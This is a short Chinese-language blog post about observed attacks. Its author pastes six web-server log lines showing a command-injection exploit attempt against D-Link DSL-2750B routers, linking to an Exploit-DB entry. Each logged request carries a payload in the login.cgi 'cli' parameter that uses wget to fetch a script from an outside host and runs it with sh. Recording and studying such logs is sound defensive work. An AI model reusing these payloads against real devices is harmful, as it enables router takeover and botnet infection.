2018年7月22日 星期日

從 Web Log 學習系統漏洞 18

不知是什麼鬼, 最近來很多
好像是 D-Link DSL-2750B 的漏洞遠端攻擊
https://www.exploit-db.com/exploits/44760/

156.218.224.172 - - [22/Jul/2018:08:47:24 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
41.44.216.34 - - [22/Jul/2018:09:05:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
41.238.160.154 - - [22/Jul/2018:09:25:18 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
156.203.54.57 - - [22/Jul/2018:11:34:50 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
197.32.107.117 - - [22/Jul/2018:16:34:49 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

沒有留言:

張貼留言